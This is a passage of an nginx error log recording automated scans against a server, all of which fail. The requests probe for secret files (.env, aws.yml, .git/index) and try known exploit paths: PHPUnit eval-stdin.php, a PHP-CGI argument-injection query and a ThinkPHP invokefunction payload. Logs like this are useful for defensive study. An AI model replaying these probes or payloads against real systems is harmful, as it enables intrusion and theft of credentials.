localhost-nginx-proxy-manager, request: "GET /getcfg.php HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:56 [error] 364#364: *244528 open() "/var/www/html/cp/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /cp/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:56 [error] 364#364: *244529 open() "/var/www/html/ads/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /ads/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:56 [error] 364#364: *244530 open() "/var/www/html/config/aws.yml" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /config/aws.yml HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:56 [error] 365#365: *244531 open() "/var/www/html/staticfiles/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /staticfiles/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:56 [error] 365#365: *244532 open() "/var/www/html/opt/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /opt/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:56 [error] 365#365: *244533 open() "/var/www/html/Api/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /Api/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:56 [error] 365#365: *244534 open() "/var/www/html/App/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /App/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:57 [error] 365#365: *244535 open() "/var/www/html/psnlink/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /psnlink/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:57 [error] 365#365: *244536 open() "/var/www/html/ftpmaster/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /ftpmaster/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:57 [error] 365#365: *244537 open() "/var/www/html/error/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /error/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:57 [error] 365#365: *244538 open() "/var/www/html/div/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /div/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:57 [error] 365#365: *244539 open() "/var/www/html/theme/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /theme/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:57 [error] 365#365: *244540 open() "/var/www/html/well-known/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /well-known/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:57 [error] 365#365: *244541 open() "/var/www/html/old.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /old.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:57 [error] 365#365: *244542 open() "/var/www/html/environments/local/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /environments/local/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:57 [error] 365#365: *244543 open() "/var/www/html/environments/production/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /environments/production/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:58 [error] 365#365: *244544 open() "/var/www/html/scripts/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /scripts/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:58 [error] 365#365: *244545 open() "/var/www/html/styles/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /styles/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:58 [error] 366#366: *244546 open() "/var/www/html/inc/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /inc/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:58 [error] 366#366: *244547 open() "/var/www/html/.env_bak" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env_bak HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:58 [error] 366#366: *244548 open() "/var/www/html/.env-sample" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env-sample HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:58 [error] 366#366: *244549 open() "/var/www/html/fastlane/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /fastlane/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 11:38:52 [error] 372#372: *246055 open() "/var/www/html/.git/index" failed (2: No such file or directory), client: 77.83.39.162, server: localhost-nginx-proxy-manager, request: "GET /.git/index HTTP/1.1", host: "92.249.249.197" +2026/01/17 11:39:30 [error] 372#372: *246058 open() "/var/www/html/index.htm" failed (2: No such file or directory), client: 45.194.92.18, server: localhost-nginx-proxy-manager, request: "GET /index.htm HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 11:45:44 [error] 373#373: *246071 open() "/var/www/html/druid/index.html" failed (2: No such file or directory), client: 20.65.219.43, server: localhost-nginx-proxy-manager, request: "GET /druid/index.html HTTP/1.1", host: "92.249.249.197" +2026/01/17 11:46:06 [error] 373#373: *246073 open() "/var/www/html/.env" failed (2: No such file or directory), client: 195.178.110.190, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 12:21:34 [error] 370#370: *246099 open() "/var/www/html/api" failed (2: No such file or directory), client: 195.3.222.78, server: localhost-nginx-proxy-manager, request: "POST /api HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:32:47 [error] 370#370: *246103 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:13 [error] 370#370: *246109 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:13 [error] 370#370: *246109 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:14 [error] 370#370: *246109 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:14 [error] 370#370: *246109 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:15 [error] 370#370: *246109 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:15 [error] 370#370: *246109 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:16 [error] 370#370: *246109 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:16 [error] 370#370: *246109 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:16 [error] 370#370: *246109 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:17 [error] 370#370: *246109 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:17 [error] 370#370: *246109 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:18 [error] 370#370: *246109 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:18 [error] 370#370: *246109 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:18 [error] 370#370: *246109 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:19 [error] 370#370: *246109 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:19 [error] 370#370: *246109 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:20 [error] 370#370: *246109 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:20 [error] 370#370: *246109 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:21 [error] 370#370: *246109 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:21 [error] 370#370: *246109 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:22 [error] 370#370: *246109 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:22 [error] 370#370: *246109 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:22 [error] 370#370: *246109 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:23 [error] 370#370: *246109 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:23 [error] 370#370: *246109 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:23 [error] 370#370: *246109 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:24 [error] 370#370: *246109 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:24 [error] 370#370: *246109 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:24 [error] 370#370: *246109 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:25 [error] 370#370: *246109 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:25 [error] 370#370: *246109 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:26 [error] 370#370: *246109 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:26 [error] 370#370: *246109 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:26 [error] 370#370: *246109 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:27 [error] 370#370: *246109 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:27 [error] 370#370: *246109 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:28 [error] 370#370: *246109 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:28 [error] 370#370: *246109 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:28 [error] 370#370: *246109 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:28 [error] 370#370: *246109 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:45:29 [error] 370#370: *246109 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 103.207.99.1, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 12:46:34 [error] 373#373: *247602 open() "/var/www/html/login" failed (2: No such file or directory), client: 167.94.138.44, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "92.249.249.197" +2026/01/17 13:42:30 [error] 373#373: *247643 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 13:52:21 [error] 370#370: *247653 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 111.228.9.192, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 13:52:46 [error] 370#370: *247653 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 111.228.9.192, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 14:43:52 [error] 370#370: *247690 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 15:18:09 [error] 370#370: *247737 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208" +2026/01/17 15:32:17 [error] 373#373: *249243 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 167.94.146.50, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "91.82.83.208" +2026/01/17 16:11:35 [error] 373#373: *249274 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 16:34:31 [error] 370#370: *249291 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 17:11:07 [error] 379#379: *249320 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 17:13:29 [error] 380#380: *249321 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 17:21:32 [error] 377#377: *249327 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208" +2026/01/17 17:22:21 [error] 377#377: *249331 open() "/var/www/html/portal/redlion" failed (2: No such file or directory), client: 128.203.200.182, server: localhost-nginx-proxy-manager, request: "GET /portal/redlion HTTP/1.1", host: "91.82.83.208" +2026/01/17 17:37:56 [error] 377#377: *249342 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:36 [error] 378#378: *249456 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:37 [error] 378#378: *249456 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:37 [error] 378#378: *249456 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:37 [error] 378#378: *249456 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:37 [error] 378#378: *249456 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:38 [error] 378#378: *249456 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:38 [error] 378#378: *249456 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:38 [error] 378#378: *249456 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:39 [error] 378#378: *249456 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:39 [error] 378#378: *249456 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:39 [error] 378#378: *249456 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:39 [error] 378#378: *249456 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:40 [error] 378#378: *249456 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:40 [error] 378#378: *249456 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:40 [error] 378#378: *249456 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:41 [error] 378#378: *249456 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:41 [error] 378#378: *249456 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:41 [error] 378#378: *249456 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:41 [error] 378#378: *249456 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.180.145.120, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/17 19:07:41 [error] 378#378: *249456 open() 